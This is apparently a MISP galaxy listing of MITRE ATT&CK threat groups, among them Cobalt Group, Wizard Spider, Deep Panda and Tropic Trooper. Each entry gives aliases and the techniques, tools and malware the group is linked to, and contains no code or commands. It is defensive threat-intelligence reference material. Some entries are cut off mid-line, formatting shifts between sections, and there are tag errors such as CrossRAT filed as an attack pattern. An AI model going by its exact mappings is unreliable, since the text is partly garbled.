• uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Right-to-Left Override - T1036.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="ABK - S0469" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="down_new - S0472" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="build_downer - S0471" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="BBK - S0470" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Avenger - S0473" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="ShadowPad - S0596" with estimative-language:likelihood-probability="almost-certain"

Table 4268. Table References

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<th>Links</th>
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<td><a href="https://attack.mitre.org/groups/G0060">https://attack.mitre.org/groups/G0060</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses">https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses</a></td>
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**Dark Caracal - G0070**

[Dark Caracal](https://attack.mitre.org/groups/G0070) is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. (Citation: Lookout Dark Caracal Jan 2018)

The tag is: *misp-galaxy:mitre-intrusion-set="Dark Caracal - G0070"

Dark Caracal - G0070 is also known as:

- Dark Caracal

Dark Caracal - G0070 has relationships with:


• uses: misp-galaxy:mitre-malware="FinFisher - S0182" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Bandook - S0234" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="CrossRAT - S0235" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Pallas - S0399" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"


Table 4269. Table References

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<td><a href="https://attack.mitre.org/groups/G0070">https://attack.mitre.org/groups/G0070</a></td>
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<td><a href="https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf">https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf</a></td>
</tr>
</tbody>
</table>
Cobalt Group - G0080

[Cobalt Group](https://attack.mitre.org/groups/G0080) is a financially motivated threat group that has primarily targeted financial institutions. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. [Cobalt Group](https://attack.mitre.org/groups/G0080) has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims. (Citation: Talos Cobalt Group July 2018) (Citation: PTSecurity Cobalt Group Aug 2017) (Citation: PTSecurity Cobalt Group Dec 2016) (Citation: Group IB Cobalt Aug 2017) (Citation: Proofpoint Cobalt June 2017) (Citation: RiskIQ Cobalt Nov 2017) (Citation: RiskIQ Cobalt Jan 2018) Reporting indicates there may be links between [Cobalt Group](https://attack.mitre.org/groups/G0080) and both the malware [Carbanak](https://attack.mitre.org/software/S0030) and the group [Carbanak](https://attack.mitre.org/groups/G0008). (Citation: Europol Cobalt Mar 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Cobalt Group - G0080"

Cobalt Group - G0080 is also known as:

• Cobalt Group
• Cobalt Gang
• Cobalt Spider

Cobalt Group - G0080 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
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• uses: misp-galaxy:mitre-malware="More_eggs - S0284" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="SDelete - S0195" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
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• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
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• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
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• uses: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://blog.morphisec.com/cobalt-gang-2.0">https://blog.morphisec.com/cobalt-gang-2.0</a></td>
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</table>

Deep Panda - G0009

[Deep Panda](https://attack.mitre.org/groups/G0009) is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. (Citation: Alperovitch 2014) The intrusion into healthcare company Anthem has been attributed to
Deep Panda ([https://attack.mitre.org/groups/G0009](https://attack.mitre.org/groups/G0009)). (Citration: ThreatConnect Anthem) This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. (Citration: RSA Shell Crew) Deep Panda ([https://attack.mitre.org/groups/G0009](https://attack.mitre.org/groups/G0009)) also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. (Citration: Symantec Black Vine) Some analysts track Deep Panda ([https://attack.mitre.org/groups/G0009](https://attack.mitre.org/groups/G0009)) and [APT19]([https://attack.mitre.org/groups/G0073](https://attack.mitre.org/groups/G0073)) as the same group, but it is unclear from open source information if the groups are the same. (Citration: ICIT China’s Espionage Jul 2016)

The tag is: *misp-galaxy:mitre-intrusion-set="Deep Panda - G0009"

**Deep Panda - G0009 is also known as:**

- Deep Panda
- Shell Crew
- WebMasters
- KungFu Kittens
- PinkPanther
- Black Vine

**Deep Panda - G0009 has relationships with:**

- similar: *misp-galaxy:threat-actor="Shell Crew"* with *estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:threat-actor="Hurricane Panda"* with *estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:threat-actor="Codoso"* with *estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-tool="Ping - S0097"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware="Sakula - S0074"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-tool="Tasklist - S0057"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018"* with *estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="StreamEx - S0142" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Mivast - S0080" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Derusbi - S0021" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

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**Wizard Spider - G0102**

[Wizard Spider](https://attack.mitre.org/groups/G0102) is a financially motivated criminal group that has been conducting ransomware campaigns since at least August 2018 against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)

The tag is: `misp-galaxy:mitre-intrusion-set="Wizard Spider - G0102"`

Wizard Spider - G0102 is also known as:
Wizard Spider
UNC1878
TEMP.MixMaster
Grim Spider

Wizard Spider - G0102 has relationships with:

- uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="TrickBot - S0266" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Emotet - S0367" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="Ryuk - S0446" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="Dyre - S0024" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1588.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Nltest - S0359" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Ping - S0097" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="BloodHound - S0521" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
Dust Storm - G0031

[Dust Storm](https://attack.mitre.org/groups/G0031) is a threat group that has targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. (Citation: Cylance Dust Storm)

The tag is: *misp-galaxy:mitre-intrusion-set="Dust Storm - G0031"

Dust Storm - G0031 is also known as:

- Dust Storm

Dust Storm - G0031 has relationships with:

- similar: *misp-galaxy:threat-actor="Dust Storm"* with estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-malware="S-Type - S0085"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware="Misdat - S0083"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware="ZLib - S0086"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"* with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="Mis-Type - S0084" with estimative-language:likelihood-probability="almost-certain"

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**Night Dragon - G0014**

[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)

The tag is: *misp-galaxy:mitre-intrusion-set="Night Dragon - G0014"

Night Dragon - G0014 is also known as:

- Night Dragon

Night Dragon - G0014 has relationships with:

- similar: misp-galaxy:threat-actor="Night Dragon" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-tool="gsecdump - S0008" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="zwShell - S0350" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="ASPXSpy - S0073" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="at - S0110" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1330" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote access tool development - T1351" with estimative-language:likelihood-probability="almost-certain"

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Blue Mockingbird - G0108

[Blue Mockingbird](https://attack.mitre.org/groups/G0108) is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.(Citation: RedCanary Mockingbird May 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Blue Mockingbird - G0108"
Blue Mockingbird - G0108 is also known as:

- Blue Mockingbird

Blue Mockingbird - G0108 has relationships with:

- **uses**: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"
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- **uses**: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
- **uses**: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="COR PROFILER - T1574.012" with estimative-language:likelihood-probability="almost-certain"

Table 4275. Table References

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<td><a href="https://attack.mitre.org/groups/G0108">https://attack.mitre.org/groups/G0108</a></td>
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<td><a href="https://redcanary.com/blog/blue-mockingbird-cryptominer/">https://redcanary.com/blog/blue-mockingbird-cryptominer/</a></td>
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**Tropic Trooper - G0081**

[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Tropic Trooper - G0081"

Tropic Trooper - G0081 is also known as:

• Tropic Trooper

• Pirate Panda

• KeyBoy

Tropic Trooper - G0081 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="KeyBoy - S0387" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="YAHOYAH - S0388" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="BITSSAdmin - S0190" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with
• uses: misp-galaxy:mitre-malware="USBferry - S0452" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

